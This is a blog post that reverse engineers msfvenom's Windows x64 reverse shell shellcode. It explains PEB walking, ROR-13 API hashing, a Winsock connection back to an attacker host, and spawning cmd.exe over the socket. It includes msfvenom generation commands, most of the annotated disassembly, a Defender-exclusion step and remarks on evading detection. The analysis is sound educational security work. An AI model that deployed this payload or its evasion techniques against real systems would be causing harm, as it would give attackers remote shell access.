Post

Analyzing msfvenom's reverse shell payload - Windows

This is my attempt at reverse engineering the shellcode used in msfvenom's x64 reverse shell payload on Windows, and describing how it works.

Analyzing msfvenom's reverse shell payload - Windows

In this post, I will step through the shellcode used in msfvenom’s stageless reverse shell payload on Windows. While stepping through the shellcode I will explain the different mechanics and system internals used in the shellcode, and try to break it down as simply as possible. By the end of this post, you’ll have a better grasp of Windows internals, common antivirus evasion techniques, as well as a respect for the shellcode craft.

Disclaimer: I did use Anthropic’s Claude to assist in deciphering some parts of the shellcode I analyzed in this post. I did take the effort to validate Claude’s claims, and did not use Claude to generate any content in this post.

Prerequisites

Knowledge

This article assumes you have basic knowledge in assembly, C programming, and Windows System Internals. Where relevant, I’ll try to introduce concepts briefly, but a working familiarity with these topics will make the reading smoother.

Shellcode

As the title mentions, I’m using msfvenom to generate the shellcode I’m analyzing. msfvenom is a free tool offered in the Metasploit Framework. I use the objdump command in Linux to convert the shellcode into assembly instructions.

1
2
3
4
5
# generate windows reverse shell code in binary format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f raw -o revshell.bin

# decompile the shellcode into human readable assembly instructions.
objdump -D -b binary -M intel -m i386:x86-64 revshell.bin

Rather than reproducing the full shellcode here, I’ll walk through it snippet by snippet so that the focus stays on the analysis. Feel free to generate the shellcode yourself and follow along.

(Optional) Windows 11 VM & WinDbg

I’ve setup a Windows 11 VM to run the shellcode in a debugger. Since Defender has signatures stored for all msfvenom payloads, you’ll need to add an exception in Defender for the directory you plan to store the msfvenom executable. Otherwise, Defender will flag and delete the executable the second it touches the disk.

While analyzing the shellcode, I used WinDbg to help step through some of the instructions. This helped me develop a better understanding of how the shellcode operates. To generate a working payload to run in WinDbg, I had msfvenom create an executable instead of outputting the payload in raw binary format (like I did in the shellcode section).

1
2
# generate windows reverse shell executable to run in WinDbg
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f exe -o revshell.exe

Shellcode analysis

Part 1 - Initial setup

1
2
3
0:      fc                      cld
1:      48 83 e4 f0             and    rsp,0xfffffffffffffff0
5:      e8 cc 00 00 00          call   0xca

The first few instructions set the shellcode up for execution. We first clear the direction flag in EFLAGS (setting it to 0), forcing string instructions to process data forward (from low to high addresses).

The next instruction aligns the stack to a 16-byte boundary, ensuring stack pointer addresses are multiples of 16. This is a common instruction in x64 assembly, maximizing performance and preventing program crashes.

The last instruction sets our instruction pointer to 0xca (as well as other things). I’ll cover the significance of this instruction more in part 3.

Part 2 - Function address lookup

This function is the meat and bones of how the shellcode works. Without it, we wouldn’t be able to call functions within the Windows API or load additional libraries as needed. It is also the most in-depth part of our analysis, since we’ll also be covering some of the essential parts of how Windows Processes and executables operate.

2.1: Stage 1 - PEB walking & API hashing

In this stage, we’ll parse the Process Environment Block (PEB), and grab a list of the imported DLLs from the Loader Data (Ldr). One at a time, we’ll load a DLL name and ROR-13 hash it to be sent off to Stage 2. The following diagram shows the flow of this process.

stage 1 light stage 1 dark Diagram 1: Stage 1 flowchart.

2.1.1: Save register values
1
2
3
4
5
6
   a:   41 51                   push   r9
   c:   41 50                   push   r8
   e:   52                      push   rdx
   f:   51                      push   rcx
  10:   56                      push   rsi
  11:   48 31 d2                xor    rdx,rdx 

These first few instructions are pretty simple. Push all the values from the registers we plan to use to the stack, so the registers can be restored to their previous state when the function ends. Lastly, zero out rdx.

2.1.2: Load first DLL name from the Ldr
1
2
3
4
5
  14:   65 48 8b 52 60          mov    rdx,QWORD PTR gs:[rdx+0x60]
  19:   48 8b 52 18             mov    rdx,QWORD PTR [rdx+0x18]
  1d:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  21:   48 8b 72 50             mov    rsi,QWORD PTR [rdx+0x50]
  25:   48 0f b7 4a 4a          movzx  rcx,WORD PTR [rdx+0x4a]

In Windows x64 assembly, gs is a segment register (the x86 equivalent is fs). Its base address points to the TEB (Thread Environment Block). From the TEB we can access the pointer address for the PEB (Process Environment Block), giving us access to information regarding the current running process. Some of this information includes a list of modules the process imports (including DLLs). The following diagram attempts to visualize how this structure is laid out.

peb walk light peb walk dark Diagram 2: How the shellcode accesses the PEB, Ldr, and InMemoryOrderModuleList structures.

The first three assembly instructions load an address pointing to our first DLL from the Ldr into the rdx register. From there, we retrieve the BaseDllName and its max length into the rsi and rcx registers using the last two instructions.

This technique is known as PEB walking. It’s commonly used by malicious processes to look up functions in memory since, unlike a normal PE (Portable Executable), shellcode doesn’t have a PE header or import table to reference when looking up functions.

2.1.3: Hash the BaseDllName and go to Stage 2
1
2
3
4
5
6
7
8
9
  2a:   4d 31 c9                xor    r9,r9
  2d:   48 31 c0                xor    rax,rax
  30:   ac                      lods   al,BYTE PTR [rsi]
  31:   3c 61                   cmp    al,0x61
  33:   7c 02                   jl     0x37
  35:   2c 20                   sub    al,0x20
  37:   41 c1 c9 0d             ror    r9d,0xd
  3b:   41 01 c1                add    r9d,eax
  3e:   e2 ed                   loop   0x2d

Next we’ll zero out the r9 and rax registers. After that, we use the lods instruction to move a single character byte into the al register (lower 8 bits of rax register). This instruction will increment the loop on its own, supplying the next character byte on each iteration of the loop until the end of the string has been reached.

Once we’ve loaded our character byte into the al register, we check to see if it is a lower-case character (a-z). If so, we’ll upper-case the letter (sub al,0x20). This is to eliminate varying naming conventions (i.e. kernel32.dll == Kernel32.Dll == KERNEL32.DLL).

Lastly, we’ll use the ror instruction to rotate the bits in the r9d register (lower 32 bits of r9 register) 13 times (0xd). Once rotated, we’ll fold the character stored in the al register into our hash stored in the r9 register (to match register sizes, r9d and eax are used).

This technique is referred to as ROR-13 hashing. It is used to hide library function names within shellcode and memory, making it harder for antivirus and EDR solutions to statically detect and signature common Windows API functions used in malware.

2.2: Stage 2 - PE export table walking

This section walks over the functions of a DLL, hashing each function name and comparing it to the function hash supplied in the r10 register. If a matching function name cannot be found, it will step to the next DLL in the Ldr and jump back to stage 1. The following diagram highlights the process flow of stage 2:

stage 2 light stage 2 dark Diagram 3: Stage 2 flowchart.

2.2.1: Load the export directory
1
2
3
4
5
6
7
8
  40:   52                      push   rdx
  41:   41 51                   push   r9
  43:   48 8b 52 20             mov    rdx,QWORD PTR [rdx+0x20]
  47:   8b 42 3c                mov    eax,DWORD PTR [rdx+0x3c]
  4a:   48 01 d0                add    rax,rdx
  4d:   8b 80 88 00 00 00       mov    eax,DWORD PTR [rax+0x88]
  53:   48 85 c0                test   rax,rax
  56:   74 67                   je     0xbf

The first two instructions save the Ldr entry and BaseDllName’s hash to the stack for later use. Following that, the base address of the DLL is loaded into the rdx register and the RVA (Relative Virtual Address) for the base of the PE (Portable Executable) Header is loaded into the eax register (lower 32 bits of rax register). The two registers are then combined into the rax register to provide the base address for the PE Header.

After that, the offset for the Export Directory’s RVA (0x88) is stored in the rax register and then tested against itself. If the IMAGE_EXPORT_DIRECTORY structure is not initialized, this will return 0. Meaning the Export Directory is empty.

If the Export Directory is empty, the code will jump to 0xbf. This is where we step to the next DLL in our list and jump back to stage 1.

The following diagram displays the PE Format, and how it pertains to this stage of the address lookup function.

pe format light pe format dark Diagram 4: The PE Format and the function table within the Export Directory.

2.2.2: Prepare ArrayOfNames[] array
1
2
3
4
5
6
  58:   48 01 d0                add    rax,rdx
  5b:   50                      push   rax
  5c:   8b 48 18                mov    ecx,DWORD PTR [rax+0x18]
  5f:   44 8b 40 20             mov    r8d,DWORD PTR [rax+0x20]
  63:   49 01 d0                add    r8,rdx
  66:   e3 56                   jrcxz  0xbe

Since the rax register is only an RVA for the Export Directory, we’ll need to add it to the base address for the DLL (rdx register). This is what the first instruction accomplishes, storing the sum in the rax register. Immediately after, we save the rax register to the stack.

We then prepare the AddressOfNames[] array. First, we’ll store the length of the array in the ecx register (lower 32 bits of rcx register), and then store the RVA pointer for the array in the r8d register (lower 32 bits of r8 register). We then combine the two registers to form a base address for the AddressOfNames[] array and store it in the r8 register.

The final instruction, jrcxz, checks if the rcx register’s value equals zero. If so, it will jump to 0xbe where it prepares to load the next DLL, since there are no functions to iterate over. If it’s not zero, then we continue on.

2.2.3: Iterate over the AddressOfNames[] array and compare to the supplied function hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
  66:   e3 56                   jrcxz  0xbe
  68:   48 ff c9                dec    rcx
  6b:   41 8b 34 88             mov    esi,DWORD PTR [r8+rcx*4]
  6f:   48 01 d6                add    rsi,rdx
  72:   4d 31 c9                xor    r9,r9
  75:   48 31 c0                xor    rax,rax
  78:   ac                      lods   al,BYTE PTR [rsi]
  79:   41 c1 c9 0d             ror    r9d,0xd
  7d:   41 01 c1                add    r9d,eax
  80:   38 e0                   cmp    al,ah
  82:   75 f1                   jne    0x75
  84:   4c 03 4c 24 08          add    r9,QWORD PTR [rsp+0x8]
  89:   45 39 d1                cmp    r9d,r10d
  8c:   75 d8                   jne    0x66

I’ve included the last instruction from the previous section (jrcxz 0xbe), since it plays a role in the loop covered in this section. The next instruction decrements the value in the rcx register by one. Essentially, this loop is going over the AddressOfNames[] array backwards.

We begin our loop by grabbing the RVA pointer of the next function name, and moving it into the esi register (lower 32 bits of rsi register). We then add the RVA to the DLL’s base address, and store it in the rsi register. Next we ROR-13 hash the function name in the rsi register and place the hash in the r9 register like we did in stage 1 with the BaseDllName. But, we use cmp al,ah instead to check for the null-byte terminator (end of string indicator).

Once the function name has been hashed, we then combine it with the BaseDllName hash we stored on the stack at the beginning of stage 2 and store it in the r9 register. Finally, we compare this newly calculated hash with the hash provided in the r10 register (r9d and r10d are used to compare the lower 32 bits of r9 and r10 registers).

If the hash doesn’t match, we jump back to the beginning of our loop at 0x66, and once again check if the value in the rcx register is zero. Otherwise, we continue on and retrieve the matching function’s address from the AddressOfFunctions[] array.

2.2.4: Retrieve address for matched function
1
2
3
4
5
6
7
8
  8e:   58                      pop    rax
  8f:   44 8b 40 24             mov    r8d,DWORD PTR [rax+0x24]
  93:   49 01 d0                add    r8,rdx
  96:   66 41 8b 0c 48          mov    cx,WORD PTR [r8+rcx*2]
  9b:   44 8b 40 1c             mov    r8d,DWORD PTR [rax+0x1c]
  9f:   49 01 d0                add    r8,rdx
  a2:   41 8b 04 88             mov    eax,DWORD PTR [r8+rcx*4]
  a6:   48 01 d0                add    rax,rdx

Once a matching hash is found, our next step is to use the index stored in the rcx register to retrieve the ordinal from the AddressOfOrdinals[] array that points to the function’s address in the AddressOfFunctions[] array. The first 4 instructions do just this, loading the AddressOfOrdinals[] base address into the r8 register and assigning the ordinal we’re looking for to the cx register (lower 16 bits of rcx register).

We then load the AddressOfFunctions[] array’s base address into the r8 register and retrieve the RVA for our hashed function and store it in the eax register (lower 32 bits of rax register). The final instruction takes the function’s RVA and adds it to the DLL’s base address, storing our function’s base address in the rax register.

2.2.5: Call the matched function
1
2
3
4
5
6
7
8
9
10
11
  a9:   41 58                   pop    r8
  ab:   41 58                   pop    r8
  ad:   5e                      pop    rsi
  ae:   59                      pop    rcx
  af:   5a                      pop    rdx
  b0:   41 58                   pop    r8
  b2:   41 59                   pop    r9
  b4:   41 5a                   pop    r10
  b6:   48 83 ec 20             sub    rsp,0x20
  ba:   41 52                   push   r10
  bc:   ff e0                   jmp    rax

The first two instructions delete the values pushed to the stack in the beginning of stage 2.

Instructions 0xad to 0xb2 restore the values to the registers that we pushed to the stack in the beginning of stage 1.

From part 3 onwards, you’ll see a reoccurring function call, call rbp. That is calling this function we’ve been covering in part 2. When you use the call instruction in assembly, it saves the next instruction’s pointer address to the stack so the function we’re calling knows where to return execution when it’s finished. It then jumps to the address in the operand. Instruction 0xb4 is retrieving this address the call instruction leaves on the stack.

Then we grow the stack by 32 bytes, and push the return address back to the stack and jump to the function address we found in the AddressOfFunctions[] array. These last two instructions mimic the call instruction, as described in the last paragraph.

2.2.6: Jump point for preparing to go back to stage 1
1
2
3
4
5
  be:   58                      pop    rax
  bf:   41 59                   pop    r9
  c1:   5a                      pop    rdx
  c2:   48 8b 12                mov    rdx,QWORD PTR [rdx]
  c5:   e9 57 ff ff ff          jmp    0x21

This last part is used to prepare our jump back to stage 1. The first two instructions delete the last two values we pushed to the stack (since the rax and r9 registers get zeroed-out in stage 1).

Now we restore the Ldr entry we saved in the beginning of stage 2 back to the rdx register. We then move the pointer address stored in the flink located in our current Ldr entry (refer to Diagram 2), pointing to our next DLL, into the rdx register and jump back down to stage 1 to hash and search again.

Part 3 - Connect to attacker machine (via Winsock)

In this part, we’ll configure Winsock and setup a reverse TCP connection to our attacker machine.

3.1: Configure rbp to point to address lookup function

1
2
3
4
5:      e8 cc 00 00 00          call   0xd6
a:      41 51                   push   r9
...
ca:     5d                      pop    rbp

I’ve included the instructions at 0x5 and 0xa. What the call instruction at 0x5 did was push 0xa to the stack. This is the pointer for our address lookup function we covered in part 2. 0xca assigns our address lookup function’s address to the rbp register.

The rbp register is normally used for determining the base of our stack, but we’ll be using it as placeholder for the address we use to call our function from part 2 with.

3.2: Create SOCKADDR_IN struct & call LoadLibraryA(“ws2_32”)

1
2
3
4
5
6
7
8
9
10
11
12
13
  cb:   49 be 77 73 32 5f 33    movabs r14,0x32335f327377
  d2:   32 00 00 
  d5:   41 56                   push   r14
  d7:   49 89 e6                mov    r14,rsp
  da:   48 81 ec a0 01 00 00    sub    rsp,0x1a0
  e1:   49 89 e5                mov    r13,rsp
  e4:   49 bc 02 00 11 5c 7f    movabs r12,0x100007f5c110002
  eb:   00 00 01 
  ee:   41 54                   push   r12
  f0:   49 89 e4                mov    r12,rsp
  f3:   4c 89 f1                mov    rcx,r14
  f6:   41 ba 4c 77 26 07       mov    r10d,0x726774c
  fc:   ff d5                   call   rbp

We will now move the string 0x32335f327377 (converts to “ws2_32\0”) into the r14 register. This string is the name used when importing the Winsock library. We’ll need this library’s functions to connect a shell process back to our attacker machine.

Now we’ll push the r14 register to the stack, then move the stack pointer (pointing to our string) back into the r14 register. We do this because the argument for LoadLibraryA requires a pointer to a string, which this technically is.

We then grow our stack by 416 bytes (0x1a0), and push our new stack pointer to the r13 register.

Next, we move our SOCKADDR_IN structure to the r12 register. Our struct looks something like this in memory:

SOCKADDR_IN diagram light SOCKADDR_IN diagram dark Diagram 5: SOCKADDR_IN structure.

Address family is stored in memory as little-endian, like most other values in x86 architecture. This equals out to AF_INET (0x0002), and should always be AF_INET.

Since port and IP address are used by the network stack, they need to be stored in memory as big-endian. It is confusing to decipher at first, but easier as you become more familiar with it.

Like our “ws2_32” string in the r14 register, we’ll push the r12 register holding our SOCKADDR_IN structure to the stack and move the stack pointer into the r12 register. This creates a pointer to our SOCKADDR_IN structure.

We’ll now move the pointer to our “ws2_32” string in the r14 register into the rcx register, since rcx holds the first argument for a function. Then we’ll move the hash 0x726774c into the r10d register (lower 32 bits of r10 register). This hash is the ROR-13 hash of the LoadLibraryA function.

Finally, we call our address lookup function. This will match our hash for LoadLibraryA, find its address in memory, then jump to it with a pointer to our “ws2_32” string as the only argument in the rcx register.

3.3: Call WSAStartup()

1
2
3
4
5
  fe:   4c 89 ea                mov    rdx,r13
 101:   68 01 01 00 00          push   0x101
 106:   59                      pop    rcx
 107:   41 ba 29 80 6b 00       mov    r10d,0x6b8029
 10d:   ff d5                   call   rbp

In the last section, we grew the stack 416 bytes and pushed the stack pointer into the r13 register. We will now move this pointer into the rdx register. Then we will push the value 0x101 to the stack, and immediately pop it into the rcx register.

Now it’s time for us to load the hash for the WSAStartup function into the r10d register (lower 32 bits of the r10 register) and call the function.

The first argument (rcx register) of the WSAStartup function uses a WORD value to specify which Windows Sockets version should be used. The higher byte stores the minor version number and the lower byte stores the major version number. In our shellcode, we are loading version 1.1 of Windows Sockets.

The second argument (rdx register) is the pointer address where WSAStartup will store the WSADATA structure on the stack. This will hold information necessary for utilizing the Windows Sockets API.

3.4: Call WSASocketA()

1
2
3
4
5
6
7
8
9
10
 10f:   50                      push   rax
 110:   50                      push   rax
 111:   4d 31 c9                xor    r9,r9
 114:   4d 31 c0                xor    r8,r8
 117:   48 ff c0                inc    rax
 11a:   48 89 c2                mov    rdx,rax
 11d:   48 ff c0                inc    rax
 120:   48 89 c1                mov    rcx,rax
 123:   41 ba ea 0f df e0       mov    r10d,0xe0df0fea
 129:   ff d5                   call   rbp

We will now create the socket for our network connection using the WSASocketA function. This function takes in more than six arguments, so we’ll need to utilize the stack to handle the last two arguments.

At this point, the rax register should equal 0x0. The first instruction will set the dwFlags argument to 0x0, meaning no flags will be set. The second instruction sets the g argument to 0x0 as well, meaning no group operations are performed. We utilize the stack to pass these arguments to the WSASocketA function. Since the stack is LIFO (Last In First Out) we need to pass the dwFlags argument first, since it is the last argument. Then we’ll push the g argument.

Next we will zero-out the r8 and r9 registers. This will set the protocol and lpProtocolInfo arguments to NULL. We then increment the rax register and assign that value to rdx register, equaling 0x1. This will set the type argument to SOCK_STREAM. We once again increment the rax register and assign that value to rcx register, equaling 0x2. This will set the af argument to AF_INET.

Once this is all set, we now load the hash for the WSASocketA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a handle for the new socket in the rax register.

3.5: Connect to the attacker host

1
2
3
4
5
6
7
 12b:   48 89 c7                mov    rdi,rax
 12e:   6a 10                   push   0x10
 130:   41 58                   pop    r8
 132:   4c 89 e2                mov    rdx,r12
 135:   48 89 f9                mov    rcx,rdi
 138:   41 ba 99 a5 74 61       mov    r10d,0x6174a599 <- connect()
 13e:   ff d5                   call   rbp

connect function

First, we move our winsock handle returned by the last function into the rdi register. We then load 0x10 (16 in decimal) to the r8 register. This will serve as the length of our SOCKADDR_IN structure. Then we will move the SOCKADDR_IN structure into the rdx register, and move our socket handle into the rcx register.

Then we will load the hash for the Winsock connect function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function will return zero.

Part 4 - Spawn a shell

In this part, we spawn a cmd.exe shell with STDIN/STDOUT/STDERR pointing to our socket handle. We then wait for the newly created process to terminate and gracefully exit our shellcode.

4.1: Call CreateProcessA() to open cmd.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
 140:   48 81 c4 40 02 00 00    add    rsp,0x240
 147:   49 b8 63 6d 64 00 00    movabs r8,0x646d63
 14e:   00 00 00 
 151:   41 50                   push   r8
 153:   41 50                   push   r8
 155:   48 89 e2                mov    rdx,rsp
 158:   57                      push   rdi
 159:   57                      push   rdi
 15a:   57                      push   rdi
 15b:   4d 31 c0                xor    r8,r8
 15e:   6a 0d                   push   0xd
 160:   59                      pop    rcx
 161:   41 50                   push   r8
 163:   e2 fc                   loop   0x161
 165:   66 c7 44 24 54 01 01    mov    WORD PTR [rsp+0x54],0x101
 16c:   48 8d 44 24 18          lea    rax,[rsp+0x18]
 171:   c6 00 68                mov    BYTE PTR [rax],0x68
 174:   48 89 e6                mov    rsi,rsp
 177:   56                      push   rsi
 178:   50                      push   rax
 179:   41 50                   push   r8
 17b:   41 50                   push   r8
 17d:   41 50                   push   r8
 17f:   49 ff c0                inc    r8
 182:   41 50                   push   r8
 184:   49 ff c8                dec    r8
 187:   4d 89 c1                mov    r9,r8
 18a:   4c 89 c1                mov    rcx,r8
 18d:   41 ba 79 cc 3f 86       mov    r10d,0x863fcc79 <- CreateProcessA()
 193:   ff d5                   call   rbp

This is gonna be a long and in-depth section, so I’ll hop right into it. First thing we do is shrink our stack. This will give us a clean slate to work with, while also keeping any necessary structures still in place. Then we’ll move the string “cmd\0” into the r8 register, setting the remaining bytes in the register to 0x00. We then push the string in the r8 register to the stack twice. Once for somewhere to reference via a pointer, and another time to add padding. We then move the string’s address to the rdx register. We will use the “cmd” string to tell CreateProcessA that we want to open a cmd.exe shell.

Next, we’re going to work on creating our STARTUPINFO and PROCESS_INFORMATION structures on the stack. We start by taking our socket handle stored in the rdi register, and pushing it to the stack three times. These will act as our STDIN, STDOUT, and STDERR handles in the STARTUPINFO structure. This means we’ll be receiving all input from and sending all output and errors to our attacker machine via our reverse TCP connection.

Now, we’re going to provision the rest of our STARTUPINFO and PROCESS_INFORMATION structure’s memory on the stack. We do this by zeroing out the r8 register. Next we set the rcx register to 0xd (13 in decimal). We’ll then push the r8 register to the stack 13 times with the loop instruction. What this does is push 13 QWORDs (104 bytes) worth of null-bytes to the stack.

With the three handles we’ve already pushed to the stack, as well as 104 null-bytes we’ve provisioned on the stack, this represents the STARTUPINFO and PROCESS_INFORMATION structures. To get a better understanding of what this looks like in memory, please refer to Diagram 6 below:

CreateProcessA Stack Diagram light CreateProcessA Stack Diagram dark Diagram 6: How PROCESS_INFORMATION and STARTUPINFO structures are laid out in the stack.

Before we proceed with aligning our arguments for CreateProcessA on the stack and appropriate registers, we must set a couple of the member values in our STARTUPINFO structure. First, we set the STARTUPINFO.dwFlags member to 0x101. This sets the STARTF_USESTDHANDLES (0x100) flag, which tells CreateProcessA to use the hStdInput/Output/Error fields, and the STARTF_USESHOWWINDOW (0x001) flag, which hides the cmd.exe window so it spawns invisibly (no console popup). We then load the address for our STARTUPINFO structure (rsp+0x18) into the rax register, and set the STARTUPINFO.cb member’s value to 0x68 (104 in decimal). STARTUPINFO.cb is the first member in our STARTUPINFO structure, and is responsible for holding the byte length of the structure.

We then load the PROCESS_INFORMATION structure’s address (located at rsp+0x00) into the rsi register. This structure will be responsible for holding the process and thread handles for our newly spawned cmd.exe process, as well as its process and thread IDs.

Since the stack is last-in-first-out, we’ll need to push our CreateProcessA arguments to the stack in reverse. So we push our lpProcessInformation argument in the rsi register first, followed by our lpStartupInfo argument in the rax register. Since the r8 register is still zero, lpCurrentDirectory, lpEnvironment, and dwCreationFlags will be set to zero. We then increment the r8 register by 0x1 so that we can set bInheritHandles to true. We then decrease the r8 register back to zero, and move the value into the r9 and rcx registers. This will set lpApplicationName, lpProcessAttributes, lpThreadAttributes all to zero as well. CreateProcessA’s arguments should look something like this (Note that the first 4 args represent rcx, rdx, r8, and r9 on the stack (aka shadow space)):

1
2
3
4
5
6
7
8
9
10
11
RSP+0x08 (rcx): lpApplicationName    = NULL                         (not used)
RSP+0x10 (rdx): lpCommandLine        = ptr to "cmd\0"               (spawn cmd.exe)
RSP+0x18 (r8):  lpProcessAttributes  = NULL
RSP+0x20 (r9):  lpThreadAttributes   = NULL
RSP+0x28:       bInheritHandles      = TRUE (0x1)                   (socket handle inherited)
RSP+0x30:       dwCreationFlags      = 0                            (default)
RSP+0x38:       lpEnvironment        = NULL                         (inherit parent environment)
RSP+0x40:       lpCurrentDirectory   = NULL                         (inherit cwd)
RSP+0x48:       lpStartupInfo        = ptr to STARTUPINFO           (holds socket & process creation flags)
RSP+0x50:       lpProcessInformation = ptr to PROCESS_INFORMATION   (receive hProcess & hThread handles)

We now load the hash for the CreateProcessA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a non-zero value and our cmd.exe process should be running with STDIN/STDOUT/STDERR pointing to our reverse TCP shell.

4.2: Call WaitForSingleObject()

1
2
3
4
5
 195:   48 31 d2                xor    rdx,rdx
 198:   48 ff ca                dec    rdx
 19b:   8b 0e                   mov    ecx,DWORD PTR [rsi]
 19d:   41 ba 08 87 1d 60       mov    r10d,0x601d8708 <- WaitForSingleObject()
 1a3:   ff d5                   call   rbp

After calling CreateProcessA, we need to tell our shellcode to wait for the cmd.exe process to finish, or else we’ll exit our process prematurely. This is what WaitForSingleObject does.

We start by zeroing out the rdx register, then decrementing it by 1. This will set the value of the rdx register to -1, telling WaitForSingleObject to wait indefinitely for the cmd.exe process to finish. Then we move the address in the rsi register, pointing to the dereferenced process handle in our PROCESS_INFORMATION structure, into the ecx register (lower 32 bits of rcx).

We now load the hash for the WaitForSingleObject function into the r10d register (lower 32 bits of the r10 register) and call the function. The function’s return value depends on how the process terminates.

4.3: Call GetVersion() and exit process

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 1a5:   bb f0 b5 a2 56          mov    ebx,0x56a2b5f0 <- one version of ExitProcess()
 1aa:   41 ba a6 95 bd 9d       mov    r10d,0x9dbd95a6 <- GetVersion()
 1b0:   ff d5                   call   rbp

 1b2:   48 83 c4 28             add    rsp,0x28
 1b6:   3c 06                   cmp    al,0x6
 1b8:   7c 0a                   jl     0x1c4
 1ba:   80 fb e0                cmp    bl,0xe0
 1bd:   75 05                   jne    0x1c4
 1bf:   bb 47 13 72 6f          mov    ebx,0x6f721347 <- (ntdll.dll->RtlExitUserThread()) == ExitThread())
 1c4:   6a 00                   push   0x0
 1c6:   59                      pop    rcx
 1c7:   41 89 da                mov    r10d,ebx
 1ca:   ff d5                   call   rbp

We’re now in the final section of our shellcode. We start by loading the hash for ExitProcess function into the ebx register. We then load the hash for GetVersion and call the function. This will return a major and minor version number, along with some other information. But we only need the major version in the low-order byte of the rax register (the al register).

We then cleanup the shadow space (40 bytes) left behind from when we called CreateProcessA off of the stack.

We now compare the al register to 0x6. We do this see which version of Windows we’re running on. If we’re running on Windows Vista or higher, we continue on. Otherwise, we jump down to 0x1c4, where we prepare to exit the shellcode.

Now this next bit of shellcode at 0x1ba confused me, and I can’t find a good answer for it. But the comparison seems to be something that should always be false. Meaning the instruction at 0x1bf should be dead code, since it can never be reached. If you can find a good reason for this, please email me! I’d love to know.

Anyways, we set the rcx register to 0x0, then move the hash for the ExitProcess function into the r10d register (lower 32 bits of the r10 register) and call the function. This tells Windows that the shellcode process has terminated successfully.

Conclusion

We’ve covered a lot of ground in this post. We were able to analyze how shellcode walks the PEB and ROR-13 hashes dll’s and their individual functions, then compares those hashes to a user-supplied value and returns the appropriate pointer address for a requested function. We then watched how we can create a reverse TCP connection socket to our attacker machine, and spawn a cmd.exe process that communicates over that socket handle. Once finished with the process, we observed how the shellcode gracefully exits.

Even though Microsoft Defender is able to statically detect this shellcode, with enough manipulating and rearranging, it could be possible to bypass static detection. Though, the techniques covered in this post (PEB Walking, API Hashing, dynamic function resolution) would most likely be picked up by modern endpoint detection solutions. Understanding how shellcode works is valuable for both offensive and defensive security teams. Hopefully this post gave you a solid foundation for recognizing these patterns when you encounter them in the wild.

Sources

I was able to learn more about the Windows System Internals topics within this post via the following blog posts:

Find DLL base addresses from PEB: https://rootfu.in/how-to-part-1-find-dllbase-address-from-peb-in-x64-assembly/

LDR_DATA_TABLE_ENTRY structure reference: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm

Linked Lists: https://bsodtutorials.blogspot.com/2013/10/linked-lists-flink-and-blink.html

PE Header structure: https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/

Location of the Export Directory Table in a PE: https://xen0vas.github.io/Win32-Reverse-Shell-Shellcode-part-2-Locate-the-Export-Directory-Table/#

This post is licensed under CC BY 4.0 by the author.